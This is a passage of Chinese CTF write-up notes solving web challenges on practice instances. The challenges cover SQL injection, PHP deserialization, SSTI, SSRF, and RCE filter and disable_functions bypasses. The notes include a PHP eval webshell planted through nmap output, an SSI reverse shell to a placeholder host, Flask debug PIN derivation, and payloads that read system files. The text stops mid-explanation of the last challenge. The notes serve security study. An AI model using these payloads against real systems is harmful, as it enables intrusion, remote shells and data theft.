记录一些刷题的做法与思路
0x20 [ASIS 2019]Unicorn shop
就是一个购买界面,下面的列表给了价格跟ID
逐个试一下,价格只能输入一个字符
1到3 ID的都是一样显示Wrong commodity!
image-20240301030032134
4就不一样了
image-20240301030133482
那这意思就是让我们输入一个字符但是表示的价格大比1337大的,题目名字也说了Unicorn可以试试Unicode,去https://www.compart.com/en/unicode/category/Nl 这里找一下
image-20240301030401534
如上图这几个都比1337大,输入utf-8例如0xF0 0x90 0x85 0x86,但是0x不能被识别的,经常urlencode的都知道utf8跟urlencode差不多,把0x改成%就好,所以传%F0%90%85%86
image-20240301030746913
0x21 [网鼎杯 2020 朱雀组]Nmap
这个题目跟前面的online tools异曲同工之妙,这里能输入主机名的,-iL参数能从文件读取主机名,f12能看到注释中写了flag在/flag中,所以可以-iL /flag读取
还发现过滤php字符串,直接贴payload了
' <?= eval($_POST[_]);?> -oG test.phtml '
或者
' -iL /flag -oG test.phtml '
0x22 [NPUCTF2020]ReadlezPHP
f12看看页面源代码,能找到两个路由index.php和time.php?source
直接访问time.php?source
<?php class HelloPhp public $a ; public $b ; public function __construct ( $this ->a = "Y-m-d h:i:s" ; $this ->b = "date" ; } public function __destruct ( $a = $this ->a; $b = $this ->b; echo $b ($a ); } } $c = new HelloPhp;if (isset ($_GET ['source' ])){ highlight_file (__FILE__ ); die (0 ); } @$ppp = unserialize ($_GET ["data" ]);
比较简单的序列化,但是选择什么命令比较难,值得注意的是如果选择phpinfo(),它一定要求参数
image-20240302042548712
直接选择-1
image-20240302042625353
还可以assert("eval($_POST[_]);")
0x23 [SWPU2019]Web1
/login.php进行登录
/register.php注册账号,admin账号显示已经注册过了
/addads.php申请发布广告,是存在XSS的,但是payload只能40个字符,
/detail.php?id=1能查看已经发布的广告
/empty.php清空所有发布的广告
多次尝试,在发布广告的接口处是存在SQL注入的
POST /addads.php HTTP/1.1 Host : 5dd70c4d-8cc8-4b52-9c48-72de673fadf6.node5.buuoj.cn:81User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding : gzip, deflateContent-Type : application/x-www-form-urlencodedContent-Length : 26Origin : http://5dd70c4d-8cc8-4b52-9c48-72de673fadf6.node5.buuoj.cn:81Connection : closeReferer : http://5dd70c4d-8cc8-4b52-9c48-72de673fadf6.node5.buuoj.cn:81/addads.phpCookie : PHPSESSID=32d89a558566e1b2ca726e8a61bb7185Upgrade-Insecure-Requests : 1title =1%27&content =&ac =add
title参数存在sql注入
image-20240304185140189
内容带有or、#、--、(空格)、and、information等都被禁止了,返回以下结果
image-20240304185403813
首先注释没有了,那么就只能手动闭合整个sql语句,缺少一个'
然后就是字段数,order by包含or不能用了,使用union/**/select,一直试到22才没出现以下结果
1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
image-20240305003926118
同时2、3可以显示出来
image-20240305025743878
但是不能从information_shema里面得到表名与列名了,可以使用无列名注入
假如我现在有一张user表:
image-20240305235213262
如果我使用这样的sql语句来查询:
select 1 ,2 ,3 union select * from `user `
那得到的结果就会是这样的:
image-20240305235938766
就是能得到一张新的表列名是前面查询的内容,我们只要从这个结果中使用已知的列名来查询就能查到结果
比如:
select `2 ` from (select 1 ,2 ,3 union select * from `user `)cc
cc是给表起一个别名,才能查
image-20240306001949146
回到题目,这个题目的表多是几个是存在user表的,但是题目最后还有一个limit 0,1不能被注释掉,只能显示一条记录,所以用group_concat拼接以下,为了防止反引号出现,就不直接使用1,2,3来当列名,那就可以这样构造
1 ' union select 1,(select group_concat(b) from(select 1,2 as a,3 as b union select * from users)cc),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
替换以下空格
1 '/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)cc),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
image-20240306005202663
0x24 [CISCN 2019 初赛]Love
Math
<?php error_reporting (0 );if (!isset ($_GET ['c' ])){ show_source (__FILE__ ); }else { $content = $_GET ['c' ]; $blacklist = [' ' , '\t' , '\r' , '\n' ,'\'' , '"' , '`' , '\[' , '\]' ]; foreach ($blacklist as $blackitem ) { if (preg_match ('/' . $blackitem . '/m' , $content )) { die ("请不要输入奇奇怪怪的字符" ); } } $whitelist = ['abs' , 'acos' , 'acosh' , 'asin' , 'asinh' , 'atan2' , 'atan' , 'atanh' , 'base_convert' , 'bindec' , 'ceil' , 'cos' , 'cosh' , 'decbin' , 'dechex' , 'decoct' , 'deg2rad' , 'exp' , 'expm1' , 'floor' , 'fmod' , 'getrandmax' , 'hexdec' , 'hypot' , 'is_finite' , 'is_infinite' , 'is_nan' , 'lcg_value' , 'log10' , 'log1p' , 'log' , 'max' , 'min' , 'mt_getrandmax' , 'mt_rand' , 'mt_srand' , 'octdec' , 'pi' , 'pow' , 'rad2deg' , 'rand' , 'round' , 'sin' , 'sinh' , 'sqrt' , 'srand' , 'tan' , 'tanh' ]; preg_match_all ('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/' , $content , $used_funcs ); foreach ($used_funcs [0 ] as $func ) { if (!in_array ($func , $whitelist )) { die ("请不要输入奇奇怪怪的函数" ); } } eval ('echo ' .$content .';' ); } ?>
通过代码审计能看出,对输入的内容进行了过滤,函数只能使用白名单中的数学函数,还过滤了一些字符,同时还限制了payload不超过80的长度,跟无字母RCE的做法有些许类似,参考一下别的师傅的文章
首先比较简单的是base_convert()函数,能在不同进制之间进行转换,并返回字符串,36进制的值能包含所有的字母,所以可以通过10进制转换成36进制获得字符串,例如base_convert("1751504350",10,36)结果为system
其次就是在白名单中的函数名称可以直接当成字符串来使用的,为了构造特殊字符(空格)、*、/等,就需要使用异或来计算,例如'10'^asinh^pi为"(空格)+*",也就是dechex(16)^exp^tan,为什么要用dechex这个函数呢,因为异或要使用字符串的10,不能直接传10会当成int来进行异或,就不能得到正确的值,这样一来我们就要京可能短地构造,这里我选择system("nl /*")这个
base_convert (1751504350 ,10 ,36 )(base_convert (849 ,10 ,36 ).(dechex (356 )^exp^tan));
image-20240307041644538
还有另外一个方法跟一个trick:构造_GET字符,这个就跟无字母rce很像了
但是ban了[、],可以使用{、}来代替
$pi =base_convert (37907361743 ,10 ,36 )(dechex (1598506324 ));($$pi ){pi}(($$pi ){abs})&pi=system&abs=ls /;
0x25 [极客大挑战 2019]FinalSQL
在id参数的地方存在sql盲注,过滤了(空格)、#、like等字符
可以先用length()来判断要注入的内容的长度后再进行下面,
使用payload:0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())),1,1))=70)在burpsuit中爆破表名,结果是Flaaaaag
使用payload:0^(ascii(substr(((select(group_concat(column_name))from(information_schema.columns)where(table_name)=(%27Flaaaaag%27))),1,1))=101)
爆破字段名(这里我只爆破了小写字母,再试其他的即可)
结果是id、fl4gawsl,真无语,把内容爆出来结果不是。。
image-20240309221855498
还有一张表F1naI1y,按照上面做法再爆一次就出了,在password字段里面
0x26 [De1CTF 2019]SSRF Me
from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys) sys.setdefaultencoding('latin1' ) app = Flask(__name__) secert_key = os.urandom(16 ) class Task : def __init__ (self, action, param, sign, ip ): self.action = action self.param = param self.sign = sign self.sandbox = md5(ip) if (not os.path.exists(self.sandbox)): os.mkdir(self.sandbox) def Exec (self ): result = {} result['code' ] = 500 if (self.checkSign()): if "scan" in self.action: tmpfile = open ("./%s/result.txt" % self.sandbox, 'w' ) resp = scan(self.param) if (resp == "Connection Timeout" ): result['data' ] = resp else : print resp tmpfile.write(resp) tmpfile.close() result['code' ] = 200 if "read" in self.action: f = open ("./%s/result.txt" % self.sandbox, 'r' ) result['code' ] = 200 result['data' ] = f.read() if result['code' ] == 500 : result['data' ] = "Action Error" else : result['code' ] = 500 result['msg' ] = "Sign Error" return result def checkSign (self ): if (getSign(self.action, self.param) == self.sign): return True else : return False @app.route("/geneSign" , methods=['GET' , 'POST' ] def geneSign (): param = urllib.unquote(request.args.get("param" , "" )) action = "scan" return getSign(action, param) @app.route('/De1ta' ,methods=['GET' ,'POST' ] def challenge (): action = urllib.unquote(request.cookies.get("action" )) param = urllib.unquote(request.args.get("param" , "" )) sign = urllib.unquote(request.cookies.get("sign" )) ip = request.remote_addr if (waf(param)): return "No Hacker!!!!" task = Task(action, param, sign, ip) return json.dumps(task.Exec()) @app.route('/' def index (): return open ("code.txt" ,"r" ).read() def scan (param ): socket.setdefaulttimeout(1 ) try : return urllib.urlopen(param).read()[:50 ] except : return "Connection Timeout" def getSign (action, param ): return hashlib.md5(secert_key + param + action).hexdigest() def md5 (content ): return hashlib.md5(content).hexdigest() def waf (param ): check=param.strip().lower() if check.startswith("gopher" ) or check.startswith("file" ): return True else : return False if __name__ == '__main__' : app.debug = False app.run(host='0.0.0.0' )
只有两个路由
首先/geneSign路由将action固定为scan,计算md5(secret_key+param+action)作为sign返回
/De1ta路由则是在cookie中获取action、sign,获取传参param,然后第一步是先检查sign,通过计算获取的参数md5(secert_key + param + action)跟传过来的sign是否一致,如果一致,当action中含有scan时,会通过urllib.urlopen(param).read()[:50],将结果写在result.txt中;如果action中含有read的时候,则会读取result.txt的内容返回
这里就有一个逻辑漏洞,在checkSign()中,是再次计算md5(secert_key + param + action),这里的param与action都是可控的,而作比较的sign的action已经固定是scan了,但是我想让action含有read
所以在访问/geneSign的时候,我们可以传参param=payloadread,最后面加上read,这样一来在计算md5的时候的字符串是{secert_key}payloadreadscan,然后我们在访问/De1ta的时候传参param=payload;action=readscan,这样在checkSign()中计算md5的字符串还是{secert_key}payloadreadscan,但是action中的内容就变成了readscan,既有scan又有read,那么既能写result.txt又能读取result.txt
最重要的是在waf()中ban了gopher跟file协议,参数不能以这两个开头,这里有两种做法
一个是[CVE-2019-9948] urllib in Python 2.x through 2.7.16,urllib.urlopen在py2周昂还支持另一种协议local-file或者local_file也能读取本地文件
另一个是urllib.urlopen在参数没有解析到任何协议头的时候会当作文件路径来读取,所以可以直接传文件路径参数即可
提示flag在./flag.txt中,不知道绝对路径,但是可以通过/proc/self/cwd/flag.txt来获取
第一种:
先/genesign?prama=flag.txtread获取sign
GET /De1ta?param=flag.txt HTTP/1.1 Host : 91fc7ebd-049f-49e1-bf83-35d44e8801a6.node5.buuoj.cn:81User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding : gzip, deflateConnection : closeUpgrade-Insecure-Requests : 1Cookie : action=readscan;sign=314fa39fc7d91b6edf7dacf11638f48a
image-20240310160839019
第二种:
先/genesign?prama=local_file:///proc/self/cwd/flag.txtread
GET /De1ta?param=local_file:///proc/self/cwd/flag.txt HTTP/1.1 Host : 91fc7ebd-049f-49e1-bf83-35d44e8801a6.node5.buuoj.cn:81User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding : gzip, deflateConnection : closeUpgrade-Insecure-Requests : 1Cookie : action=readscan;sign=1e5d1eaf358737fb1f25648b51ec2172
image-20240310161024062
0x27 [BJDCTF2020]EasySearch
dirsearch目录扫一下,存在index.php.swp
<?php ob_start (); function get_hash ( $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-' ; $random = $chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )]; $content = uniqid ().$random ; return sha1 ($content ); } header ("Content-Type: text/html;charset=utf-8" ); *** if (isset ($_POST ['username' ]) and $_POST ['username' ] != '' ) { $admin = '6d0bc1' ; if ( $admin == substr (md5 ($_POST ['password' ]),0 ,6 )) { echo "<script>alert('[+] Welcome to manage system')</script>" ; $file_shtml = "public/" .get_hash ().".shtml" ; $shtml = fopen ($file_shtml , "w" ) or die ("Unable to open file!" ); $text = ' *** *** <h1>Hello,' .$_POST ['username' ].'</h1> *** ***' ; fwrite ($shtml ,$text ); fclose ($shtml ); *** echo "[!] Header error ..." ; } else { echo "<script>alert('[!] Failed')</script>" ; }else { *** } *** ?>
能发现密码只要md5前6个是6d0bc1就可以通过了,脚本跑一下
import hashlibfrom itertools import productimport stringcharacters = string.ascii_letters max_length = 100 for length in range (1 , max_length + 1 ): for combination in product(characters, repeat=length): current_string = '' .join(combination) hash_object = hashlib.md5(current_string.encode('utf-8' )) if hash_object.hexdigest()[:6 ] == '6d0bc1' : print (current_string) exit(1 )
直接登录pppp/RhPd,在响应头里发现Url_is_here: public/b3092fb256afde24defb8438167090dc6ca59604.shtml,去访问
image-20240311151937144
能返回传入的用户名,但是注意这个文件的后缀是shtml,php的模板注入没有用了,这里是ssi,不是模板注入
ssi的简单语法:
// 输出变量名称 <!–#echo var="DOCUMENT_NAME"–> //本文档 <!–#echo var="DATE_LOCAL"–> // 时间 // 插入内容 <! #include file="文件名称"–> <! #include virtual="文件名称"–> //命令执行 <!–#exec cmd="文件名称"–> <!–#exec cgi="文件名称"–>
那就直接命令执行反弹shell
POST /index.php HTTP/1.1 Host : b00db558-fd3e-46bd-b44f-8ecd660175bb.node5.buuoj.cn:81User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding : gzip, deflateReferer : http://b00db558-fd3e-46bd-b44f-8ecd660175bb.node5.buuoj.cn:81/index.phpContent-Type : application/x-www-form-urlencodedContent-Length : 137Origin : http://b00db558-fd3e-46bd-b44f-8ecd660175bb.node5.buuoj.cn:81Connection : closeX-Forward-For : 127.0.0.1Upgrade-Insecure-Requests : 1username= %3 c !-- %23 exec%20 cmd%3 d%22 bash%20 -c %20 'bash%20 -i%20 %3 e%26 %20 %2 fdev%2 ftcp%2 fvpsip%2 f2323 %200 %3 e%261 '%22 --%3 e&password= RhPd
image-20240311152711886
0x28 [极客大挑战 2019]RCE ME
<?php error_reporting (0 );if (isset ($_GET ['code' ])){ $code =$_GET ['code' ]; if (strlen ($code )>40 ){ die ("This is too Long." ); } if (preg_match ("/[A-Za-z0-9]+/" ,$code )){ die ("NO." ); } @eval ($code ); } else { highlight_file (__FILE__ ); }
长度限制40,又是无字母rce,那只能取反来rce
<?php $ans1 ='phpinfo' ;$ans2 ="" ;$data1 =('~' .urlencode (~$ans1 ));$data2 =('~' .urlencode (~$ans2 ));echo ('(' .$data1 .')' .'(' .$data2 .')' .';' );
先看看phpinfo():(~%8F%97%8F%96%91%99%90)();,存在disable_functions
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl
那就直接assert(eval($_POST[cmd]));:(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6);
蚁剑连上去,在根目录有flag与/readflag,明显flag没有权限读的,检查一下putenv()函数还在,可以用LD_PRELOAD来绕过disable_functions
直接用蚁剑上传这里 的仓库中的bypass_disablefunc_x64.so跟bypass_disablefunc.php,上传到/tmp或者其他有权限的地方,我这里传上去的名字是c.php
然后用上面的payloadPOST传参cmd=include("/tmp/c.php");,同时GET传参/?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6);&cmd=/readflag&outpath=/tmp/123&sopath=/tmp/bypass_disablefunc_x64.so
image-20240311173118964
0x29 [SUCTF 2019]Pythonginx
@app.route('/getUrl' , methods=['GET' , 'POST' ] def getUrl (): url = request.args.get("url" ) host = parse.urlparse(url).hostname if host == 'suctf.cc' : return "我扌 your problem? 111" parts = list (urlsplit(url)) host = parts[1 ] if host == 'suctf.cc' : return "我扌 your problem? 222 " + host newhost = [] for h in host.split('.' ): newhost.append(h.encode('idna' ).decode('utf-8' )) parts[1 ] = '.' .join(newhost) finalUrl = urlunsplit(parts).split(' ' )[0 ] host = parse.urlparse(finalUrl).hostname if host == 'suctf.cc' : return urllib.request.urlopen(finalUrl).read() else : return "我扌 your problem? 333"
简单审计一下,传入的url参数会经过3个判断
首先是经过parse.urlparse(url)取出hostname,不能等于suctf.cc,接着是通过urlsplit(url)同样取出主机名,不能等于suctf.cc
最后是对主机名进行.切割,对每一部分重新编码解码encode('idna').decode('utf-8'),,然后放回urlsplit(url)的结果中,再使用urlunsplit将切割的url合并回来
再次使用parse.urlparse获取一次主机名,判断是否等于suctf.cc,等于则直接urllib.request.urlopen(finalUrl).read()
经过测试,如果输入的是file:////etc/passwd,则在第一次parse.urlparse(url)的时候返回的hostname是空值
image-20240312161942264
第一步、第二步取出hostname的时候就是空值,前两个条件都能通过,第三个条件,将分开的url重新拼接回来,使用urlunsplit,可以看看源码:
def urlunsplit (components ): """Combine the elements of a tuple as returned by urlsplit() into a complete URL as a string. The data argument can be any five-item iterable. This may result in a slightly different, but equivalent URL, if the URL that was parsed originally had unnecessary delimiters (for example, a ? with an empty query; the RFC states that these are equivalent).""" scheme, netloc, url, query, fragment, _coerce_result = ( _coerce_args(*components)) if netloc or (scheme and scheme in uses_netloc and url[:2 ] != '//' ): if url and url[:1 ] != '/' : url = '/' + url url = '//' + (netloc or '' ) + url if scheme: url = scheme + ':' + url if query: url = url + '?' + query if fragment: url = url + '#' + fragment return _coerce_result(url)
可以看到,我们的情况符合不符合第一个if,所以在拼接的时候不会再增加/,而直接拼上file跟:,就组成了最后的urlfinalUrl=file://etc/passwd,但是他需要hostname是suctf.cc所以就传file:////suctf.cc/etc/passwd就能通过所有的if并且也能读到/etc/passwd
image-20240312211118676
但是flag的位置是真难找,看看wp,原来在nginx里面(怪不得名字会有nginx。。。)
在/usr/local/nginx/conf/nginx.conf
image-20240312215853392
有flag的路径了直接读
还有一种做法是编码解码出问题,存在另一些字符经过encode('idna').decode('utf-8')可以后能转换成ascii的字符
贴一下别的师傅的脚本
chars = ['s' , 'u' , 'c' , 't' , 'f' ] for c in chars: for i in range (0x7f , 0x10FFFF ): try : char_i = chr (i).encode('idna' ).decode('utf-8' ) if char_i == c: print ('ASCII: {} Unicode: {} Number: {}' .format (c, chr (i), i)) except : pass
选一个来替换即可
/getUrl?url=file://suCtf.cc/etc/passwd
0x2A [GYCTF2020]FlaskApp
明显的计算拼码,base64解码能ssti的,有报错的debug页面的,能看到部分代码
@app.route('/decode' ,methods=['POST' ,'GET' ] def decode (): if request.values.get('text' ) : text = request.values.get("text" ) text_decode = base64.b64decode(text.encode()) tmp = "结果 : {0}" .format (text_decode.decode()) if waf(tmp) : flash("no no no !!" ) return redirect(url_for('decode' )) res = render_template_string(tmp) flash( res )
直接手打了,先{{().__class__.__base__.__subclasses__()[:300]}}看一下能利用的类,subprocess.Popen在286
直接读文件{{().__class__.__base__.__subclasses__()[286]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
root:x:0 :0 :root:/root:/bin /bash daemon:x:1 :1 :daemon:/usr/sbin:/usr/sbin/nologin bin :x:2 :2 :bin :/bin :/usr/sbin/nologinsys:x:3 :3 :sys:/dev:/usr/sbin/nologin sync:x:4 :65534 :sync:/bin :/bin /sync games:x:5 :60 :games:/usr/games:/usr/sbin/nologin man:x:6 :12 :man:/var/cache/man:/usr/sbin/nologin lp:x:7 :7 :lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8 :8 :mail:/var/mail:/usr/sbin/nologin news:x:9 :9 :news:/var/spool/news:/usr/sbin/nologin uucp:x:10 :10 :uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13 :13 :proxy:/bin :/usr/sbin/nologin www-data:x:33 :33 :www-data:/var/www:/usr/sbin/nologin backup:x:34 :34 :backup:/var/backups:/usr/sbin/nologin list :x:38 :38 :Mailing List Manager:/var/list :/usr/sbin/nologinirc:x:39 :39 :ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41 :41 :Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534 :65534 :nobody:/nonexistent:/usr/sbin/nologin _apt:x:100 :65534 ::/nonexistent:/usr/sbin/nologin flaskweb:x:1000 :1000 ::/home/flaskweb:/bin /sh
/etc/machine-id与/proc/sys/kernel/random/boot_id按顺序读一个
1408f836b0ca514d796cbf8960e45fa1
/proc/self/cgroup读第一行取斜杠分割的最后一组
12 :perf_event:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope11 :freezer:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope10 :hugetlb:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope9 :devices:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope8 :cpu,cpuacct:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope7 :pids:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope6 :memory:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope5 :rdma:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope4 :blkio:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope3 :net_cls,net_prio:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope2 :cpuset:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope1 :name=systemd:/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope0 ::/kubepods.slice /kubepods-burstable.slice /kubepods-burstable-pod6833eaff_eabc_48d4_aecb_76750e4d441e.slice /docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope
取docker-4ac6678ebb08d666b0559ce210148ffd305e2ee81d5df60eef1470b10c2d3319.scope
import hashlibfrom itertools import chainprobably_public_bits = [ 'flaskweb' 'flask.app' , 'Flask' , '/usr/local/lib/python3.7/site-packages/flask/app.py' ] private_bits = [ '55076640679313' , '1408f836b0ca514d796cbf8960e45fa1' ] h = hashlib.md5() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance (bit, str ): bit = bit.encode('utf-8' ) h.update(bit) h.update(b'cookiesalt' ) cookie_name = '__wzd' + h.hexdigest()[:20 ] num = None if num is None : h.update(b'pinsalt' ) num = ('%09d' % int (h.hexdigest(), 16 ))[:9 ] rv = None if rv is None : for group_size in 5 , 4 , 3 : if len (num) % group_size == 0 : rv = '-' .join(num[x:x + group_size].rjust(group_size, '0' ) for x in range (0 , len (num), group_size)) break else : rv = num print (rv)
输入后,直接
import osos.popen('cat /this_is_the_flag.txt' ).read()
image-20240313141152563
0x2B [0CTF 2016]piapiapia
dirsearch扫一下,www.zip有源码,审计一下,一下子就看到了在class.php中有一个filter()函数
public function filter ($string $escape = array ('\'' , '\\\\' ); $escape = '/' . implode ('|' , $escape ) . '/' ; $string = preg_replace ($escape , '_' , $string ); $safe = array ('select' , 'insert' , 'update' , 'delete' , 'where' ); $safe = '/' . implode ('|' , $safe ) . '/i' ; return preg_replace ($safe , 'hacker' , $string ); }
字符串经过filter()后会把'select', 'insert', 'update', 'delete', 'where'替换成hacker,明显如果有where那么序列化的字符串就变长了
然后在update.php中又有这样一个东西
$profile ['phone' ] = $_POST ['phone' ];$profile ['email' ] = $_POST ['email' ];$profile ['nickname' ] = $_POST ['nickname' ];$profile ['photo' ] = 'upload/' . md5 ($file ['name' ]);$user ->update_profile ($username , serialize ($profile ));
update_profile()作用于序列化后的字符串
public function update_profile ($username , $new_profile $username = parent ::filter ($username ); $new_profile = parent ::filter ($new_profile ); $where = "username = '$username '" ; return parent ::update ($this ->table, 'profile' , $new_profile , $where ); }
可以看到update_profile()是经过了filter()函数的,这就很明显是一个序列化字符逃逸了,在config.php中还有flag的字段可以考虑读取一下config.php,现在的问题是,这么多个能传参的参数,基本都有长度的限制,选择哪个能打
<?php require_once ('class.php' ); if ($_SESSION ['username' ] == null ) { die ('Login First' ); } if ($_POST ['phone' ] && $_POST ['email' ] && $_POST ['nickname' ] && $_FILES ['photo' ]) { $username = $_SESSION ['username' ]; if (!preg_match ('/^\d{11}$/' , $_POST ['phone' ])) die ('Invalid phone' ); if (!preg_match ('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/' , $_POST ['email' ])) die ('Invalid email' ); if (preg_match ('/[^a-zA-Z0-9_]/' , $_POST ['nickname' ]) || strlen ($_POST ['nickname' ]) > 10 ) die ('Invalid nickname' ); $file = $_FILES ['photo' ]; if ($file ['size' ] < 5 or $file ['size' ] > 1000000 ) die ('Photo size error' ); move_uploaded_file ($file ['tmp_name' ], 'upload/' . md5 ($file ['name' ])); $profile ['phone' ] = $_POST ['phone' ]; $profile ['email' ] = $_POST ['email' ]; $profile ['nickname' ] = $_POST ['nickname' ]; $profile ['photo' ] = 'upload/' . md5 ($file ['name' ]); $user ->update_profile ($username , serialize ($profile )); echo 'Update Profile Success!<a href="profile.php">Your Profile</a>' ; } else { ?>
发现nickname是通过strlen()来限制长度的,如果nickname传参一个数组的话,就会变成strlen("Array")=5,长度也就能突破限制,那么接下来就是构造字符串的问题了,photo的值肯定要是config.php
先随便测一下,各个参数的位置,以及nicknamme传参为数组的序列化格式
差不多是这样的a:4:{s:5:"phone";s:4:"1111";s:5:"email";s:10:"aaa@aa.com";s:8:"nickname";a:1:{i:0;s:5:"where";}s:5:"photo";s:26:"upload/ddf34250ads0a8sa7r6";}
那就传参构造nickname,由于字符串变长了,所以是将本来nickname的值挤出去成为序列化的字符串的一部分了,而且要挤出去一个字符就需要一个where,需要构造";}s:5:"photo";s:10:"config.php";}34个字符,所以带着34个where
